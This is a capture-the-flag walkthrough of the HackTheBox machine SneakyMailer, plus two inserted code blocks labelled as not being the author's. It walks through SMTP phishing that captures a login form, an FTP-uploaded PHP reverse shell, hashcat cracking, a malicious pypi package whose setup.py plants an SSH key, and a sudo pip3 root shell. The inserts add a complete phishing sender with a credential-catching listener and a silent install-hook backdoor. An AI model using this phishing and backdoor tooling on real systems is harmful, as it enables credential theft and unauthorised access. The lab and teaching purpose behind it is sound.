SneakyMailer HackTheBox Walkthrough


This is the SneakyMailer HackTheBox walkthrough. In this writeup I demonstrate, step by step, how I rooted the SneakyMailer HTB machine. Before moving ahead, a few facts about the box: SneakyMailer is a Linux machine with IP address 10.10.10.197, rated medium difficulty by its maker.

Now I am going to show you my steps.

First of all, connect your local machine to the HTB VPN and confirm connectivity by pinging 10.10.10.197. As usual, I began by scanning the IP of the SneakyMailer machine to find a starting point. Nmap [a port scanner] gave the following result.

Scanning

$nmap -sV -sC -oN nmap_scan 10.10.10.197

Nmap port scan during SneakyMailer HackTheBox Walkthrough

We have seven ports open. Let's analyse each port. Port 21 is open and vsftpd 3.0.3 is running on it. Checked whether anonymous login is allowed by logging in with anonymous:anonymous; it is not, a valid username and password are required. Then searched with searchsploit [offline search of the Exploit-DB archive] for any exploit against this vsftpd version. None available. Left it here and moved on to further enumeration.

Port 80 is open and nginx 1.14.2 is serving it. The Nmap http-title script revealed the domain sneakycorp.htb, so I added it to my /etc/hosts file.

Hosts File before Modification

Hosts File after Modification

Hosts file after modification in SneakyMailer HackTheBox Walkthrough

At http://sneakycorp.htb/team.php I found a list of employees with their email addresses. Since port 25 (SMTP) is open, any one of these may be a usable mailbox, so I built a wordlist of every address on the site with cewl.

Wordlist Creation

$cewl -n -e --email_file email.txt http://sneakycorp.htb

Creating email wordlists from the website in SneakyMailer HackTheBox Walkthrough

$cat email.txt

Listing emails created in above steps

Port 25 is open and an SMTP server is running on it. With the email list ready, I tried to verify the addresses over SMTP and, in the same message, lure whoever reads the mail to a URL I control. For background on SMTP user enumeration see the video and article linked from the original post.

Telnet to SMTP Server

Start a netcat listener on port 80 in one window (10.10.14.9 is my VPN address; use your own) and telnet to the SMTP server in the other. Lines prefixed with ~ are typed inside the SMTP session. The message body must end with a line containing only a single dot; without that terminator the server never accepts the mail.

$nc -nvlp 80

$telnet 10.10.10.197 25

~MAIL FROM: xyz.com

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~RCPT TO: [email protected]

~DATA

Hi Recipients anyone can ping me at http://10.10.14.9

.

^]

telnet>quit

Telnet to SMTP server to get email info during SneakyMailer HackTheBox Writeups

Once the mail has been accepted, the listener on port 80 receives a request: something on the box plays the role of a user who opens the link in the mail and submits a login form to it. This comes back only for a valid email address whose owner "clicks" the link. The form data arrives URL-encoded, so I decoded it online.

URL Decoding

URL decoding in SneakyMailer HackTheBox Walkthrough

After URL decoding we have the following information of a user.

firstName : Paul

lastName : Byrd

email : [email protected]

password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

rpassword : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
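The same phishing exchange as a script, added here as an example rather than code from the original walkthrough. It sends one mail per harvested address with smtplib (so a rejected RCPT TO doubles as mailbox enumeration) and replaces the `nc -nvlp 80` listener with a small HTTP server that decodes the submitted form for you. Assumptions not stated on the page: the SMTP server accepts unauthenticated MAIL FROM/RCPT TO on port 25, and the callback is an HTTP POST with a URL-encoded body, which is what the decoded data above looks like. The sender address and the script name are placeholders.

```python
#!/usr/bin/env python3
"""Mail every harvested address a link to our listener, then catch and
decode the form the "victim" submits back.  Added example; not part of the
original walkthrough.  Assumed: unauthenticated SMTP on port 25 and a
URL-encoded POST callback (as the decoded data on the page shows).
"""
import smtplib
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs


def build_message(sender: str, rcpt: str, link: str) -> str:
    """Minimal RFC 5322 message; smtplib appends the <CRLF>.<CRLF> terminator."""
    return (
        f"From: {sender}\r\n"
        f"To: {rcpt}\r\n"
        f"Subject: Please confirm your account\r\n"
        f"\r\n"
        f"Hi, please confirm your account at {link}\r\n"
    )


def send_phish(smtp_host: str, sender: str, recipients, link: str, port: int = 25):
    """Send one mail per recipient; return the addresses the server accepted.

    With a single recipient, a rejected RCPT TO raises SMTPRecipientsRefused,
    so the rejects tell us which mailboxes do not exist.
    """
    accepted = []
    with smtplib.SMTP(smtp_host, port, timeout=15) as smtp:
        for rcpt in recipients:
            try:
                smtp.sendmail(sender, [rcpt], build_message(sender, rcpt, link))
                accepted.append(rcpt)
            except smtplib.SMTPRecipientsRefused:
                continue  # unknown mailbox; smtplib already sent RSET
    return accepted


def parse_callback(body: bytes) -> dict:
    """Decode the URL-encoded form body the victim POSTs to the listener."""
    fields = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    # parse_qs returns a list per field; the login form has one value each
    return {name: values[0] for name, values in fields.items()}


class Catcher(BaseHTTPRequestHandler):
    """Listener standing in for `nc -nvlp 80`; prints the decoded form."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        data = parse_callback(self.rfile.read(length))
        print(f"[+] POST {self.path} from {self.client_address[0]}")
        for name, value in data.items():
            print(f"    {name}: {value}")
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        # A bare GET means the link was fetched but no form was submitted.
        print(f"[+] GET {self.path} from {self.client_address[0]}")
        self.send_response(200)
        self.end_headers()


def serve(port: int = 80):
    HTTPServer(("0.0.0.0", port), Catcher).serve_forever()


if __name__ == "__main__":
    # Terminal 1:  python3 phish.py listen 80
    # Terminal 2:  python3 phish.py send 10.10.10.197 email.txt http://10.10.14.9/
    if len(sys.argv) == 3 and sys.argv[1] == "listen":
        serve(int(sys.argv[2]))
    elif len(sys.argv) == 5 and sys.argv[1] == "send":
        with open(sys.argv[3]) as fh:
            targets = [line.strip() for line in fh if "@" in line]
        for addr in send_phish(sys.argv[2], "it@xyz.com", targets, sys.argv[4]):
            print("[+] accepted:", addr)
    else:
        sys.exit("usage: phish.py listen <port> | phish.py send <host> <emails.txt> <link>")
```

Run the listener first, then the sender; the listener needs root (or CAP_NET_BIND_SERVICE) to bind port 80, and the link must use the VPN address the box can reach. A GET without a following POST means the address was read but no form was submitted, which is useful to tell apart from a mailbox that simply does not exist.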

Used this information to log in to the mailbox of user paulbyrd. I used Evolution [a mail client]; any other mail client works as well.

Login to user paul using evolution mail client

After logging in, found a message in Sent Items containing a username and password:

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

Didn't know which service these credentials belong to, SSH or FTP. SSH with developer:m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C failed; FTP with the same pair logged in successfully.

FTP login

$ftp 10.10.10.197

~developer

~m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C

FTP to SneakyMailer HackTheBox using developer account

Uploaded shell.php into the dev/ directory of the FTP share. Kali ships PHP web shells under /usr/share/webshells/php/ (set the listener IP and port inside the file before uploading). Tried http://sneakycorp.htb/shell.php [since index.php is present in the same folder as shell.php] but the file was not served there. Then fuzzed sneakycorp.htb for virtual hosts with wfuzz and SecLists' subdomains-top1million-5000.txt wordlist.

FUZZING for subdomain

$wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.sneakycorp.htb" -u http://10.10.10.197/ --hc 400,301 -t 50 -c

Fuzzing for subdomains in Sneakymailer HTB

Got a subdomain dev.sneakycorp.htb, so added it to my /etc/hosts file as well.

Hosts File after Modification

Hosts file after modification (dev.sneakycorp.htb added)

Now the shell.php uploaded to the dev folder of the FTP account is reachable at http://dev.sneakycorp.htb/shell.php, and we get a remote shell very easily.

Getting Shell

1. Upload shell.php into the dev/ directory over FTP (after setting your VPN IP and port 2345 inside it)

$cd dev

$put shell.php

2. Start a netcat listener locally

$nc -nvlp 2345

3. Access the URL http://dev.sneakycorp.htb/shell.php

Uploading reverse shell using ftp and getting reverse connection on local system

Upgrade Shell

Upgrade the shell to a fully interactive Linux TTY:

$python -c 'import pty;pty.spawn("/bin/bash")'

CTRL + Z #to background the session

$stty raw -echo

$fg

Then press Enter twice

$export TERM=xterm-256color

$stty rows 60 columns 130

After some enumeration found another virtual host, pypi.sneakycorp.htb, under /var/www/, so added it to /etc/hosts too. After the change the file looks like this:

Hosts File after Modification

Hosts file after modification (pypi.sneakycorp.htb added)

Further enumeration turned up a password hash in the .htpasswd file inside /var/www/pypi.sneakycorp.htb/:

$ cat /var/www/pypi.sneakycorp.htb/.htpasswd

Showing password inside .htpasswd file

pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

Identify Hash

Identifying Hash Online

Hash identification gives the possible algorithms Apache MD5, md5apr1, MD5 (APR); the $apr1$ prefix is the giveaway.

Stored the hash in hash.txt and cracked it with hashcat [a fast hash cracker] and the rockyou.txt wordlist. Hashcat mode 1600 is Apache $apr1$ MD5.

Cracking Hash

$hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt --force

Starting to crack hash using hashcat

Password cracking using hashcat, status

Showing password cracked using hashcat

Credential: pypi:soufianeelhaoui

Tried these credentials against SSH and FTP without success. Browsing to http://pypi.sneakycorp.htb:8080 showed that pypiserver is running there. No idea what to do next; after some googling found the article linked below.

Pypiserver panel

According to that article we can create a Python package and upload it to the pypi repository; pypiserver stores it and serves it for installation.

Created a package named mypkg following the same steps as this article: https://www.linode.com/docs/applications/project-management/how-to-create-a-private-python-package-repository/. Please read it before creating and uploading a package to the pypi repository. I have cut down the number of steps shown here, but did the same things as in that article.

Creating Python Package

$mkdir mypkg

$cd mypkg

$touch setup.py setup.cfg README.md

$mkdir mypkg

$cd mypkg

$nano __init__.py

$cat __init__.py

creating mypkg directory and introducing content to it

Generated an SSH key pair on my local computer because I want to add my public key to /home/low/.ssh/authorized_keys. The custom code that writes the public key into that file goes into setup.py, which is plain Python executed whenever the package is built or installed.

root@dkm:~/.ssh# ssh-keygen

creating SSH key locally using ssh-keygen command

$nano setup.py #Put your SSH public key, and the code that writes it, inside this file

$cat setup.py

listing content of setup.py file inside mypkg home directory

$nano setup.cfg

$cat setup.cfg

Listing content of setup.cfg file inside mypkg folder

$python3 setup.py sdist #Build the source distribution (setup.py also runs here, locally)

$export HOME=/tmp/mypkg #setuptools reads .pypirc from $HOME

$nano .pypirc #Create this file in the (new) home directory; it names the repository and holds the pypi credentials

$cat .pypirc

lisiting content of pypirc file in home directory

$ python3 setup.py sdist upload -r mypkg # Upload package to repository

Uploading package to Pypi repository during SneakyMailer HackTheBox Walkthrough

Afterwards the key shows up in low's authorized_keys, and it matches the public key on our local computer:

$ cat /home/low/.ssh/authorized_keys

Listing content of authorized_keys of user low in SneakyMailer HackTheBox Walkthrough
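A setup.py that does what the walkthrough describes, added here as an example; it is not the author's file, whose contents appear above only as a screenshot. It follows the design the author explains in the comments: the code that writes our public key into /home/low/.ssh/authorized_keys runs inside a try block, and any failure is swallowed so the build still completes and nothing aborts with a traceback. Because setup.py is ordinary Python, it executes with the rights of whoever builds or installs the package, which on the box was enough to write low's file. The key line is a placeholder, and the helper names are mine; the `.pypirc` the upload step needs should name the `mypkg` repository at http://pypi.sneakycorp.htb:8080 with the cracked pypi credentials (assumed from the `-r mypkg` upload command, not shown on the page).

```python
#!/usr/bin/env python3
"""setup.py for the mypkg package uploaded to the private pypiserver.

Added example, not the setup.py from the original walkthrough.  Payload and
package metadata are both here: setup.py runs wherever the package is built
or installed, so the write below happens under that user's rights.
Assumed (not from the page): the placeholder key and the helper names.
"""
import os

# Placeholder: paste the single line from your own id_rsa.pub here.
PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIREPLACE_WITH_YOUR_KEY attacker@kali"
TARGET = "/home/low/.ssh/authorized_keys"


def read_keys(path: str) -> list:
    """Return the non-empty lines of an authorized_keys file (empty if absent)."""
    if not os.path.exists(path):
        return []
    with open(path) as fh:
        return [line.strip() for line in fh if line.strip()]


def add_authorized_key(pubkey: str, path: str = TARGET) -> bool:
    """Append pubkey to path, creating the .ssh directory with safe permissions.

    Returns True on success (or if the key is already there) and False on any
    OS error.  It never raises: an uncaught exception in setup.py would abort
    the build and leave a traceback wherever the package is processed.
    """
    key = pubkey.strip()
    try:
        os.makedirs(os.path.dirname(path), mode=0o700, exist_ok=True)
        if key in read_keys(path):
            return True  # idempotent: rebuilding must not duplicate the key
        with open(path, "a") as fh:
            fh.write(key + "\n")
        # With StrictModes (sshd's default) a group/world-writable file is ignored
        os.chmod(path, 0o600)
        return True
    except OSError:
        return False


if __name__ == "__main__":
    # Runs for `python3 setup.py sdist` locally and again wherever the sdist
    # is installed.  The payload goes first so a metadata error later on
    # cannot prevent it.
    add_authorized_key(PUBKEY)
    from setuptools import setup
    setup(
        name="mypkg",
        version="0.1.0",
        description="Placeholder package",
        packages=["mypkg"],
    )
```

Note that `python3 setup.py sdist` executes the same code on your own machine; the write to /home/low fails there and returns False, which is exactly the quiet failure the try/except is for. The sdist tarball carries this setup.py unchanged, so the server side runs the identical payload.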

Once our public key is in low's authorized_keys file, we can SSH in as low remotely using the private key stored in /root/.ssh/ on our local computer.

SSH using Private Key

root@dkm:~/.ssh# chmod 700 id_rsa

root@dkm:~/.ssh# ssh -i id_rsa low@10.10.10.197

Login remotely using private ssh key in sneakymailer HackTheBox Machine

Capture User FLAG

$cat user.txt

SneakyMailer HackTheBox user flag found during Walkthrough

Privilege Escalation

Finding PrivEsc Vector

Ran sudo -l to check which commands user low may run with elevated privileges.

$ sudo -l

Checking special permission of user low using sudo

User low can run /usr/bin/pip3 through sudo. The privilege-escalation vector is therefore this sudo rule: pip3 install executes the setup.py of whatever it is asked to install, so point it at a directory whose setup.py spawns a shell. Three commands do it, taken from https://gtfobins.github.io/gtfobins/pip/:

$ TF=$(mktemp -d)

$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py

$ sudo pip3 install $TF

SneakyMailer HackTheBox privilege escalation using pip3 in Walkthrough

Capture Root Flag

#cat /root/root.txt

SneakyMailer HackTheBox root flag found after walkthrough

This is how I rooted the SneakyMailer HackTheBox machine. Learnt a lot during this challenge; hope you have also learnt something new. Thanks for reading this walkthrough. If you have any issue, feel free to comment. Want to give any suggestion about the writeup? Please write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/

This Post Has 6 Comments

  1. Habibi

    Nice thanks

  2. StupidOne

    Hello, could you explain how you wrote the SSH public key to authorized_keys? It seems that only low has rights to modify it. Is it just because low is related to the pypi-pkg group, and while the package was uploading there was the possibility to write to authorized_keys?

    1. Deepak Kumar Maurya

      Yes. It is because user low is related to pypi-pkg. In the setup.py file we put the code that writes our SSH key inside a try block and the remaining code inside an except block. If writing the SSH key is successful it will skip the except block. The SSH key is written to /home/low/.ssh/authorized_keys due to the write permission given to the package folder and its files inside the /var/www/pypi.sneakycorp.htb directory.

      1. StupidOne

        OK, thank you for reply. Actually, it is very nice writeup.

  3. Bharath Raju

    Could you help me log in to Evolution? I found it difficult, using it for the first time.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/